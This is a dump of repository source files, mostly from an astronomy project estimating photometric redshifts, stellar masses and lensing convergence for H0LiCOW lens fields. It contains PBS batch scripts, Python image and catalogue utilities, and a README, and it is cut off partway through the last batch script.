"b892e9f2af088de0df07be37ac5aedaea78512a7", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 94, "license_type": "permissive", "max_line_length": 71, "num_lines": 3, "path": "/decompress_example.sh", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nxz -d -c example_data/sequences.fasta.xz > example_data/sequences.fasta \n" }, { "alpha_fraction": 0.6474575996398926, "alphanum_fraction": 0.6474575996398926, "avg_line_length": 29.102041244506836, "blob_id": "136a1c5b10ee9ce09041e1028b6bf32114cc56d2", "content_id": "36a70006e83dee36fa541c878efd49b87e046f75", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1475, "license_type": "permissive", "max_line_length": 114, "num_lines": 49, "path": "/Snakefile", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "import datetime\n\nif \"builds\" not in config:\n config[\"builds\"] = 
{}\nif \"files\" not in config:\n configfile: \"defaults/parameters.yaml\"\n\nif \"origins\" in config:\n include: \"workflow/snakemake_rules/preprocess.smk\"\n\nif \"reference-builds\" in config:\n config[\"builds\"].update(config[\"reference-builds\"])\n # Include rules to handle primary build logic from multiple sequence alignment\n # to output of auspice JSONs for a default build.\n include: \"workflow/snakemake_rules/reference_build.smk\"\n\n\nif \"templated-builds\" in config:\n include: \"workflow/snakemake_rules/templated_build.smk\"\n\nif len(config[\"builds\"]):\n include: \"workflow/snakemake_rules/subsampling.smk\"\n include: \"workflow/snakemake_rules/core.smk\"\n\nauspice_prefix = config.get(\"auspice_prefix\", \"ncov\")\nrule all:\n input:\n lambda w: [auspice_dir + f\"/{auspice_prefix}_{build}.json\" for build in config[\"builds\"]] +\\\n [auspice_dir + f\"/{auspice_prefix}_{build}_root-sequence.json\" for build in config[\"builds\"]] +\\\n [auspice_dir + f\"/{auspice_prefix}_{build}_tip-frequencies.json\" for build in config[\"builds\"]]\n\nrule clean_all:\n message: \"Removing directories: {params}\"\n params:\n \"builds\",\n \"auspice\",\n \"pre-processed\",\n \"data\"\n shell:\n \"rm -rfv {params}\"\n\n\nrule clean:\n message: \"Removing directories: {params}\"\n params:\n \"builds\",\n \"auspice\"\n shell:\n \"rm -rfv {params}\"\n" } ]
9
eduardrusu/zMstarPDF
https://github.com/eduardrusu/zMstarPDF
4393a9085e0c72a3d91c154b975af94ee9c69214
0ebc596666505a624cd947ad00c5b971f89b9bcd
b473cd3def86bb2a79a36d7b9639e6e36507266a
refs/heads/master
2020-12-24T13:21:25.488825
2020-10-27T06:39:00
2020-10-27T06:39:00
31,794,803
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6651480793952942, "alphanum_fraction": 0.7608200311660767, "avg_line_length": 23.38888931274414, "blob_id": "6a0ed22ec75eee15e85ffad22e0def7b4843e558", "content_id": "e05eb640edeba65c23705531bf04ad27320e22ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 439, "license_type": "no_license", "max_line_length": 98, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer17.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log17.out\n#PBS -e Log17.err\n#PBS -N 17\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2228.py WFI2033 5 45 23 meds gal gamma oneoverr tidal\npython inferkappa_unbiasedwithshearincrement2224.py WFI2033 5 120 23 meds gal gamma oneoverr tidal\n" }, { "alpha_fraction": 0.6069254279136658, "alphanum_fraction": 0.6194825172424316, "avg_line_length": 38.223880767822266, "blob_id": "c8c4a8fb1a51dc3a303a5919df800e46fcd11f1b", "content_id": "3dc0de0afc8903cebf119f7d4145941f542ed36e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2628, "license_type": "no_license", "max_line_length": 122, "num_lines": 67, "path": "/python/image_utilities/HSCmatchcutoutpsf.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given folders containing image cutouts and corresponding PSFs, match them by accounting for duplicates and missing files\n# run as python HSCmatchcutoutpsf.py\n\n#from astropy.io import fits\nimport numpy as np\nimport os\nimport glob\nfrom astropy.wcs import WCS\nfrom astropy.io import fits\n\npath = \"/Volumes/LaCieSubaru/Gaia/James/\"\nos.chdir(path)\nfolder_cutout = glob.glob('arch*')\nfolder_psf = glob.glob('psf-*')\n\nlist_cutout = np.array([])\nfor i in range(len(folder_cutout)):\n files = glob.glob('%s/*' % folder_cutout[i])\n files_array = np.asarray(files)\n list_cutout = np.r_[list_cutout,files_array]\n\nlist_psf = np.array([])\nfor i in range(len(folder_psf)):\n files = glob.glob('%s/*' % folder_psf[i])\n files_array = np.asarray(files)\n list_psf = np.r_[list_psf,files_array]\n\nlist_psf_filter = np.empty(len(list_psf),dtype=\"string\")\nlist_psf_ra = np.zeros(len(list_psf))\nlist_psf_dec = np.zeros(len(list_psf))\nfor i in range(len(list_psf)):\n str = list_psf[i].split(\"-\")\n ra = float(str[10])\n if str[-2] == '': str[-1] = '-' + str[-1]\n dec = float(str[-1][:-5])\n filter = str[7]\n list_psf_filter[i] = filter\n list_psf_ra[i] = ra\n list_psf_dec[i] = dec\n\nlist_cutout_filter = np.empty(len(list_cutout),dtype=\"string\")\nlist_cutout_ra = np.zeros(len(list_cutout))\nlist_cutout_dec = np.zeros(len(list_cutout))\nfor i in range(len(list_cutout)):\n if i % 1000 == 0: print i\n file = fits.open(list_cutout[i])\n w = WCS(file[1].header)\n coord = w.wcs_pix2world(21,21,1)\n list_cutout_ra[i] = coord[0]\n list_cutout_dec[i] = coord[1]\n file.close()\n str = list_cutout[i].split(\"-\")\n filter = str[5]\n list_cutout_filter[i] = filter\n\nout_cutout = np.c_[list_cutout,list_cutout_filter,list_cutout_ra,list_cutout_dec]\nout_psf = np.c_[list_psf,list_psf_filter,list_psf_ra,list_psf_dec]\nnp.savetxt(\"cutouts_g.cat\",out_cutout[out_cutout[:,1]=='G'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"cutouts_r.cat\",out_cutout[out_cutout[:,1]=='R'],'%s \\t %s \\t %s 
\\t %s')\nnp.savetxt(\"cutouts_i.cat\",out_cutout[out_cutout[:,1]=='I'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"cutouts_z.cat\",out_cutout[out_cutout[:,1]=='Z'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"cutouts_y.cat\",out_cutout[out_cutout[:,1]=='Y'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"psf_g.cat\",out_psf[out_psf[:,1]=='G'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"psf_r.cat\",out_psf[out_psf[:,1]=='R'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"psf_i.cat\",out_psf[out_psf[:,1]=='I'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"psf_z.cat\",out_psf[out_psf[:,1]=='Z'],'%s \\t %s \\t %s \\t %s')\nnp.savetxt(\"psf_y.cat\",out_psf[out_psf[:,1]=='Y'],'%s \\t %s \\t %s \\t %s')\n" }, { "alpha_fraction": 0.7431014180183411, "alphanum_fraction": 0.7811892628669739, "avg_line_length": 106.20833587646484, "blob_id": "dcd847e65f06ab30c6c90b28eb272a3bd2f7ea6d", "content_id": "ab08e26af0b0e9ce3cde4d404682749d8c97d52d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2575, "license_type": "no_license", "max_line_length": 632, "num_lines": 24, "path": "/README.md", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# zMstarPDF\n\nCalculating joint photo-z and Mstar PDFs, while coping with various systematics.\n\nMotivated primarily by understanding massive structures along the lines of sight to time delay strong gravitational lenses so that we can attempt to make accurate time delay distance measurements, we are trying to infer photometric redshifts simultaneously (or at least self-consistently) with stellar masses, from optical and near infrared survey photometry.\n\nOur main test data are the 5 H0LiCOW lens fields, observed in _ugriJHK_ as well as 4 _IRAC_ bands. We use a weighted counts approach to translate measured over/under-densities in these fields, with respect to a large calibration survey, into a probability distribution for the external convergence (see [_Rusu et al, 2017_](http://adsabs.harvard.edu/abs/2016arXiv160701047R) for details). Our calibration data of choice are the CFHTLenS object catalogs, generated with `SExtractor`, with photo-zs and stellar mass estimates from `BPZ` and `LePhare`, respectively. We have two options for inferring z and Mstar from these datasets:\n\n* Follow the same procedure as the CFHTLenS team, so that we can simply re-use their data products. This is the approach we used in [_Rusu et al, 2017_](http://adsabs.harvard.edu/abs/2016arXiv160701047R).\n* Infer z and Mstar from the CFHTLS and H0LiCOW photometry afresh, generating MCMC samples from Pr(z,Mstar|data) directly. This is possible using the `stellarpops` code (Auger et al 2010).\n\nThis repository contains scripts and notes, as well as code used in our investigations of these options. In particular, it contains the complete code used for the analysis presented in [_Rusu et al, 2017_](http://adsabs.harvard.edu/abs/2016arXiv160701047R). 
**The porting of the code is not yet complete.** A summary of our results is available on this [webpage](http://shsuyu.github.io/H0LiCOW/site/paperIII.html).\n\nAt present, we have completed our investigation of the first H0LiCOW lens, HE0435−1223, and we are focusing on the second lens, WFI2033-4723.\n\n### People\n\n* Cristian Eduard Rusu (UC Davis)\n* Chris Fassnacht (UC Davis)\n* Phil Marshall (KIPAC)\n\n### Contacts, License etc.\n\nThis is astronomy research in progress: while the contents of this repository are publicly visible, they are Copyright 2015 the authors, and not available for re-use. Please cite _([Rusu et al, 2017](http://adsabs.harvard.edu/abs/2016arXiv160701047R))_, _(Rusu et al, in preparation)_ if you need to refer to this work, and feel free to get in touch via [this repo's issues](https://github.com/eduardrusu/zMstarPDF/issues).\n" }, { "alpha_fraction": 0.6352829337120056, "alphanum_fraction": 0.7874464988708496, "avg_line_length": 63.727272033691406, "blob_id": "70fb7371ce4449eb6adf3f225018e3661e7c73a9", "content_id": "40461be19dcbef8d96bd6c5914 ea1cb864e14a82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/python/scripts/NAOJ/batch4_insertstars.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1\n#PBS -o Logb4.out\n#PBS -e Logb4.err\n#PBS -N 4\n#PBS -l mem=11gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_1_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_2_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_3_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_4_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_5_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_6_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_7_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_0_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_1_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_2_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_3_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_4_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_5_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_6_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_4_7_N_4096_ang_4_rays_to_plane_34_f 23 120 
measured 5\n" }, { "alpha_fraction": 0.5442214012145996, "alphanum_fraction": 0.5751492381095886, "avg_line_length": 33.12963104248047, "blob_id": "660347c06384fea66e688d29c4613a8ad5777861", "content_id": "3698e99d698004af58063a93d45f83f1722e5c47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1812, "license_type": "no_license", "max_line_length": 124, "num_lines": 53, "path": "/python/modeling_utilities/mcmc_multipleprogression.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given a list of MCMC chains, plot them all to assess burn-in and convergence\r\n# run as python mcmc_multipleprogression.py file1 [file2] [...]\r\n\r\nimport sys\r\nimport numpy as np\r\nimport pylab as plt\r\n\r\nchains = len(sys.argv) - 1\r\nprint \"Using %s chains...\" % chains\r\nfiles = sys.argv\r\n\r\nplt.clf()\r\nfor j in range(chains):\r\n x=np.loadtxt(sys.argv[j + 1],unpack=True)\r\n ndim = np.shape(x)[0] - 1\r\n if j == 0: fig, axes = plt.subplots(ndim, 1, sharex=True, figsize=(5, 1*10*ndim))\r\n x = x[1:]\r\n for i in range(ndim):\r\n axes[i].plot(x[i],linewidth=0.1,alpha=0.8)\r\n if i ==0: axes[i].set_ylabel(\"%s\" %i)\r\naxes[i].set_xlabel(\"step number\")\r\nfig.tight_layout(h_pad=0.0)\r\n\r\n# Program to find the stem (longest common substring) of a given list of words\r\n# This code is contributed by ita_c (https://www.geeksforgeeks.org/longest-common-substring-array-strings/)\r\ndef findstem(arr):\r\n # Determine size of the array\r\n n = len(arr)\r\n # Take first word from array\r\n # as reference\r\n s = arr[0]\r\n l = len(s)\r\n res = \"\"\r\n for i in range( l) :\r\n for j in range( i + 1, l + 1) :\r\n # generating all possible substrings\r\n # of our reference string arr[0] i.e s\r\n stem = s[i:j]\r\n k = 1\r\n for k in range(1, n):\r\n # Check if the generated stem is\r\n # common to all words\r\n if stem not in arr[k]:\r\n break\r\n # If current substring is present in\r\n # all strings and its length is greater\r\n # than current result\r\n if (k + 1 == n and len(res) < len(stem)):\r\n res = stem\r\n return res\r\n\r\nstems = findstem(files[1:])\r\nfig.savefig(\"%stimeline.png\" % stems)\r\n" }, { "alpha_fraction": 0.718120813369751, "alphanum_fraction": 0.7583892345428467, "avg_line_length": 35.05882263183594, "blob_id": "87fa641d5012d25d21e7a6d2fa6d1df4477fdf2f", "content_id": "41306bca0ec63f8df4c77de5241715d1dedac992", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 596, "license_type": "no_license", "max_line_length": 126, "num_lines": 17, "path": "/python/image_utilities/zoom.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Interpolates a .fits image. 
Used here in order to sample an IRAC PSF to the pixel scale of the Tphot registration catalogue.\n\nimport numpy as np\nimport scipy\nfrom astropy.io import fits\nfrom scipy import ndimage\norigimg = fits.open('ker_i_ch1.fits')\norigdata = origimg[0].data\norigarray = np.array(origdata)\nzoomarray = scipy.ndimage.interpolation.zoom(origarray,0.9)\nzoomdata = fits.PrimaryHDU(zoomarray)\nzoomdata.writeto('ker_i_ch1_zoom0.9_.fits')\norigimg.close()\n\n# after this, do in IRAF:\n# imcopy ker_i_ch1_zoom0.9_.fits[6:104,6:104] ker_i_ch1_zoom0.9.fits\n# imdel ker_i_ch1_zoom0.9_.fits\n" }, { "alpha_fraction": 0.5442214012145996, "alphanum_fraction": 0.5751492381095886, "avg_line_length": 33.12963104248047, "blob_id": "660347c06384fea66e688d29c4613a8ad5777861", "content_id": "3698e99d698004af58063a93d45f83f1722e5c47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1843, "license_type": "no_license", "max_line_length": 169, "num_lines": 54, "path": "/python/image_utilities/HSClistforcutouts.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given a catalogue of RA and DEC, produces the input lists for DAS Cutout\n# run as python HSClistforcutouts.py /Volumes/LaCieSubaru/Gaia/DelchambreHSC5arcsecunique.cat\n\nimport os\nimport sys\nimport numpy as np\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\ncat = str(sys.argv[1])\ns = cat.split('/')[:-1]\npath = ''\nfor i in range(len(s)):\n path = path + s[i] + '/'\n\ncoord = np.loadtxt(cat,unpack=True)\nhead = '#? rerun filter ra dec sw sh # column descriptor\\n'\nrerun = 's18a_wide'\nfilters = ['HSC-G','HSC-R','HSC-I','HSC-Z','HSC-Y']\nsw = '7.5asec'\nsh = '7.5asec'\ndescriptor = '#'\n\nlen1 = np.shape(coord[0])[0] * len(filters) / 1000\nlen2 = np.shape(coord[0])[0] * len(filters) % 1000\nif len2 > 0: len1 +=1\nlen3 = np.shape(coord[0])[0] * len(filters) / len1\nlen4 = np.shape(coord[0])[0] * len(filters) % len1\nlen4 = len3 + len4\n\nfout = []\nfor i in range(len1):\n fout.append(path + cat.split('/')[-1][:-4] + '_cutout' + str(i) +'.cat')\n os.system(\"rm -f %s\" % fout[i])\n\nstrcoord = []\nfor i in range(np.shape(coord[0])[0]):\n x = SkyCoord(np.float(coord[0][i]), np.float(coord[1][i]), unit='deg')\n strcoord.append('{0} {1}'.format(x.ra.to_string(unit=u.hourangle, sep=':', precision=2, pad=True), x.dec.to_string(sep=':', precision=2, alwayssign=True, pad=True)))\n\n\npos = 0\nfor i in range(len1):\n f = open(fout[i],'a')\n f.write(head)\n if i == 0:\n for j in range(len4):\n f.write(rerun + ' ' + filters[pos % len(filters)] + ' ' + strcoord[pos / len(filters)] + ' ' + sw + ' ' + sh + ' ' + descriptor + '\\n')\n pos += 1\n if i != 0:\n for j in range(len3):\n f.write(rerun + ' ' + filters[pos % len(filters)] + ' ' + strcoord[pos / len(filters)] + ' ' + sw + ' ' + sh + ' ' + descriptor + '\\n')\n pos += 1\n f.close()\n" }, { "alpha_fraction": 0.5616679191589355, "alphanum_fraction": 0.6121577620506287, "avg_line_length": 52.797298431396484, "blob_id": "d3f0657d273e33553cbe3023fe4daf1cebd7c726", "content_id": "5821bcd35c93de8705eb231c64a12dbe7d4027a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3981, "license_type": "no_license", "max_line_length": 273, "num_lines": 74, "path": "/python/catalogue_utilities/MstarMilleniumSLAC_WFI2033_griK.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code computes stellar masses with LePhare for the galaxies in 
the Millennium Simulation, using a set of griK filters. It does this for the photometric redshift estimated in a previous run with photozMillenium_WFI2033.py, and for the \"true\" catalogue redshift as well.\n# Run on SLAC batch as python /scratch/cerusu/MstarMilleniumSLAC_WFI2033.py /scratch/cerusu/GGL_los_8_7_7_3_3_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_griK_WFI2033.images_forlephare.txt\n# Needed to remove all headers because SLAC is running an old version of numpy\n\nimport numpy as np\nimport scipy\nimport sys\nimport os\nfrom os import system\nimport time\n\nstart_timefield = time.time()\n\nfile = str(sys.argv[1])\nif \"griK\" in file:\n fileinspecz = file[:-4] + \"_mstarspecz.txt\"\n fileinphotoz = file[:-4] + \"_mstarphotoz.txt\"\nfileout = file[:-4] + \"_mstar.txt\"\n\nid = 0\nu = 1\nu_err = 2\ng = 3\ng_err = 4\nr = 5\nr_err = 6\ni = 7\ni_err = 8\nz = 9\nz_err = 10\nJ = 11\nJ_err = 12\nH = 13\nH_err = 14\nK = 15\nK_err = 16\n\nif \"griK\" in file:\n specz = 17\n photoz = 18\n\nprint file\ndata = np.loadtxt(file,unpack=True)\nif \"griK\" in file:\n #str = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t J \\t J_err \\t H \\t H_err \\t Ks \\t Ks_err \\t context \\t z-spec \\t string\"\n dataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[J],data[J_err],data[H],data[H_err],data[K],data[K_err],data[specz]]\n #np.savetxt(fileinspecz,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 255 \\t %.3f')\n np.savetxt(fileinspecz,dataout,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 255 \\t %.3f')\n os.system(\"/scratch/cerusu/runlephare_phys_para_millenium.sh %s\" % fileinspecz) # run LePhare\n os.system(\"rm %s\" % fileinspecz[16:]) # to remove /scratch/cerusu/\n mstar_specz = np.loadtxt(fileinspecz + \".MAG_BC03_I09.lephareout\",usecols=[33,35],unpack=True)\n mstar_specz[0][mstar_specz[1] > 0] = mstar_specz[1][mstar_specz[1] > 0] # replace good MASS_BEST with good MASS_MED\n mstar_specz[0][mstar_specz[0] < 0] = 9 # replace bad MASS_BEST with 9\n os.system(\"rm %s\" % fileinspecz[16:] + \".MAG_BC03_I09.lephareout\")\n \n #str = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t J \\t J_err \\t H \\t H_err \\t Ks \\t Ks_err \\t context \\t z-spec \\t string\"\n dataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[J],data[J_err],data[H],data[H_err],data[K],data[K_err],data[photoz]]\n #np.savetxt(fileinphotoz,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 255 \\t %.2f')\n np.savetxt(fileinphotoz,dataout,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 255 \\t %.2f')\n os.system(\"/scratch/cerusu/runlephare_phys_para_millenium.sh %s\" % fileinphotoz)\n os.system(\"rm %s\" % fileinphotoz[16:])\n mstar_photoz = np.loadtxt(fileinphotoz + \".MAG_BC03_I09.lephareout\",usecols=[33,35],unpack=True)\n mstar_photoz[0][mstar_photoz[1] > 0] = mstar_photoz[1][mstar_photoz[1] > 0]\n mstar_photoz[0][mstar_photoz[0] < 
0] = 9\n #str = \"ID \\t mstar_specz \\t mstar_photoz\"\n #np.savetxt(fileout,np.c_[data[id],mstar_specz[0],mstar_photoz[0]],header=str,fmt='%d \\t %.3f \\t %.3f')\n np.savetxt(fileout,np.c_[data[id],mstar_specz[0],mstar_photoz[0]],fmt='%d \\t %.3f \\t %.3f')\n os.system(\"rm %s\" % fileinphotoz[16:] + \".MAG_BC03_I09.lephareout\")\n\nos.system(\"rm %s\" % file[16:])\n\nprint(\"Total time for field: --- %s seconds ---\" % (time.time() - start_timefield))\n \nprint 'Done!'\n" }, { "alpha_fraction": 0.6352829337120056, "alphanum_fraction": 0.7874464988708496, "avg_line_length": 62.727272033691406, "blob_id": "c9b03b1c64488084db873d204f47b0c9eb998670", "content_id": "ef6fdac9c9effa7cc849bc6967de6f0b39c96126", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/python/scripts/NAOJ/batch6_insertstars.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1\n#PBS -o Logb6.out\n#PBS -e Logb6.err\n#PBS -N 6\n#PBS -l mem=11gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_1_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_2_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_3_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_4_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_5_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_6_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_7_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_0_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_1_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_2_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_3_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_4_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_5_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_6_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_7_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\n" }, { "alpha_fraction": 0.6352829337120056, "alphanum_fraction": 0.7874464988708496, "avg_line_length": 62.727272033691406, "blob_id": "7df81bf4ee4bae8a71d919e5f6544d3e15752e4d", "content_id": "72b48151091138f99563c2be699de5f4b5711367", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2103, "license_type": "no_license", 
"max_line_length": 117, "num_lines": 33, "path": "/python/scripts/NAOJ/batch0_insertstars.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb0.out\n#PBS -e Logb0.err\n#PBS -N 0\n#PBS -l mem=15gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_1_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_2_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_3_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_4_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_5_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_6_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_7_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_1_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 